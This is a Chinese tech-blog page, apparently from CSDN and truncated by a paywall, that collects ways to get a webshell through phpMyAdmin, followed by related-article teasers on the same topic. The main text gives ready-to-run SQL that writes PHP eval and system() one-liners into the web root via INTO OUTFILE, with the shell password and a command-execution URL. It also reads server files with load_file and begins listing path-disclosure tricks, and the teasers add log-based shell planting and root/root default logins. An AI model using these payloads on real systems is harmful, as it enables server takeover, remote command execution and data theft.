phpmyadmin后台

最新推荐文章于 2025-05-30 17:53:27 发布
最新推荐文章于 2025-05-30 17:53:27 发布
阅读量1.4k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
文章标签: PHP 后台
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/kclax/article/details/90513443
本文介绍了多种利用PHP在数据库中创建、读取和导出文件的方法,如通过CREATE TABLE、INSERT INTO、SELECT INTO OUTFILE等SQL语句。此外,还列举了不同场景下的路径爆破技术,包括通过URL参数、错误信息、配置文件、PHPmyadmin等途径获取服务器路径信息。这些方法展示了如何在合法操作和恶意攻击中使用PHP。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

方法一:
CREATE TABLE mysql.xiaoma (xiaoma1 TEXT NOT NULL );
INSERT INTO mysql.xiaoma (xiaoma1 )VALUES (’<?php @eval($_POST[xiaoma])?>’);
SELECT xiaomaFROM study INTO OUTFILE ‘E:/wamp/www/7.php’;
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
一句话连接密码:xiaoma

方法二:
Create TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES(’<?php eval($_POST[xiaoma])?>’);
select xiaoma1 from xiaoma into outfile ‘E:/wamp/www/7.php’;
Drop TABLE IF EXISTS xiaoma;

方法三:

读取文件内容: select load_file(‘E:/xamp/www/s.php’);

写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

cmd执行权限:select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’

方法四:
select load_file(‘E:/xamp/www/xiaoma.php’);

select ‘<?php echo \'

\';system($_GET[\'cmd\']); echo \'
\'; ?>’ INTO OUTFILE ‘E:/xamp/www/xiaoma.php’
然后访问网站目录: http://www.xxxx.com/xiaoma.php?cmd=dir

php爆路径方法收集 :

1、单引号爆路径
说明:
直接在

最低0.47元/天 解锁文章

200万优质内容无限畅学
Coisini、
关注
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 988
访问一下 最后getshell
墨者学院-phpMyAdmin后台文件包含分析溯源
qq_47094508的博客
07-01 1435
首先拿到题目到点击访问访问后使用弱口令进行登陆,如登陆失败开启隐私模式或者更换浏览器账户密码:root root点击sql模块 对sql语句进行一个查询首先查询sql写一句话的权限我们可以看到他的值为空secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 继续查看mysql安装的绝对路径,可以发现他是安装在/var/lib/mysql/ 接下来确认一下mysql权限,可以看到这里是最高权限r
phpMyAdmin后台文件包含分析溯源
asd158923328的博客
08-20 1536
靶场地址:https://www.mozhe.cn/bug/detail/RDM4VFA0aHFWT25Na09mdmhqcklxdz09bW96aGUmozhe 根据题意 进入访问页 弱口令进入,账号root,密码root 进入SQL执行 使用菜刀连接服务器 在根目录下我们发现key.txt文件 打开查看 ...
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1260
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
phpmyadmin
最新发布
qq_33382118的博客
05-30 569
对于Windows,可通过XAMPP或WAMP等集成环境一键安装,或手动下载PHPMyAdmin压缩包并解压到Web服务器目录(如。PHPMyAdmin通常可通过包管理器安装或手动部署。或根据服务器配置的路径调整。首次登录需输入MySQL用户名和密码(默认用户通常为。安装过程中会提示选择Web服务器(如Apache或Nginx),按需配置即可。进入数据库后,点击“新建”按钮创建表。)和字段数,随后定义字段属性(如。
第三方应用类---Phpmyadmin 后台 Getshell 操作
金灰的博客
04-21 628
以Web-Base方式架构在网站主机上的MySQL的数据库管理工具.PhpMyAdmin_百度百科。
phpmyadmin后台getshell( 4.8.5)
qq_61740845的博客
09-11 542
然后去浏览器访问一些我们文件,可以成功访问就可以使用远控(中国蚁剑)getshell了。然后改变它的日志存储位置方便上马(要根据实际情况更改路径)然后通过查询我们的一句话使日志里面出现我们的一句话。
墨者学院-入门级-phpMyAdmin后台文件包含分析溯源-小白必看(超详细)
kitiu666的博客
01-26 1493
2021年1月26日,第六次渗透测试。 实在抱歉,因为工作原因许久没有更新测试,期间生活也发生了很多事,现在心情也不怎么好,但也尽量讲细一点吧,开干! 准备需求: 1、win10系统; 2、中国菜刀; 1、进入靶场 账号:root 密码:root 这个账号密码都是看其他的教程知道的,至于怎样破解出来不知道,能力有限,过后我看看怎么来的吧。(如果了解再回来追跟); 2、进入到后台,到SQL页面,在控制台下输入以下命令,然后点击执行; select ‘<?php eval($_POST[key
phpMyAdmin后台getshell复现
09-18
本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦登录后,攻击者可以利用phpMyAdmin的日志记录功能来执行特定的操作,进而实现getshell。具体...
Phpmyadmin后台代码执行CVE-2016-5734_poc
09-30
Phpmyadmin后台代码执行CVE-2016-5734_poc CVE-2016-5734在exploit-db上也就是 phpMyAdmin 4.6.2 - Authenticated Remote Code Execution ,意即phpMyAdmin认证用户的远程代码执行,根据描述可知受影响的phpMyAdmin...
PHP爆绝对路径方法
qax
10-06 1235
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=149′ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。 www.xxx.com/researcharchive.php?id=-1 3、Google爆路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
PHP爆绝对路径方法收集
07-24
PHP爆绝对路径方法收集,可以学习一下啊,比较全面了
利用phpMyAdmin拿webshell
05-01
利用phpMyAdmin拿webshell 利用phpMyAdmin拿webshell
PhpMyAdmin后台getshell
qq_50854662的博客
03-14 1221
PhpMyAdmin简介 PhpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录(可试下:http://ip:端口/phpmyadmin/ )时,进而通过弱口令(可以直接尝试下账号root密码root)或者暴力破解进入管理后台之后,有
php爆绝对路径方法
KHOST的博客
03-16 468
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 Eg: www.xxxxxx.com/news.php?id=149' 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。单引号被过滤时不妨试试。 Eg: www.xxxxxxxxx.com/researcharch...
php爆绝对路径的几种方法
weixin_30755709的博客
03-27 305
WordPress的平台,爆绝对路径的 方法是:url/wp-admin/includes/admin.phpurl/wp-content/plugins/akismet/akismet.phpurl/wp-content/plugins/akismet/hello.phpphpMyAdmin暴路径办法:phpMyAdmin/libraries/select_lang.lib.phpphpMyA...
php 获取绝对路径,thinkphp怎么获取绝对路径
weixin_35980011的博客
03-10 2100
用Jsp获取、用Java类获取或用servlet获取项目绝对路径。一、用Jsp获取1、获取文件的绝对路径String file="文件";(例如:data.mdb)String path=application.getRealPath(file);2、获取文件的绝对路径String p2=request.getRequestURI();3、获取当前jsp页面的路径String p3=request...
php爆网站 绝对路径小结 - cracer_优快云
m0_67888657的博客
07-12 456
一旦找到phpmyadmin的管理页面,再访问该目录下的某些特定文件,就很有可能爆出物理路径。解决方法其实也很简单,既然我们不能减慢目标网站的速度,那我们就想办法减慢自己的速度,这样达到的效果是一样的。也很简单,只要我们找一个速度极慢的代理,挂上以后再上目标网站,就有可能将绝对路径爆出来。注意,如果目标站点是二级域名,site接的是其对应的顶级域名,这样得到的信息要多得多。有时在图片地址后加/x.php,该图片不但会被当作php文件执行,还有可能爆出物理路径。将要提交的参数值改成错误值,比如-1。
复现phpmyadmin后台getshell
09-12
复现phpMyAdmin后台GetShell通常指的是利用phpMyAdmin的漏洞执行未授权的代码,从而获得对服务器的控制。这通常需要以下条件: 1. 存在已知漏洞:首先,phpMyAdmin需要存在可以被利用的已知安全漏洞。这可能是一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值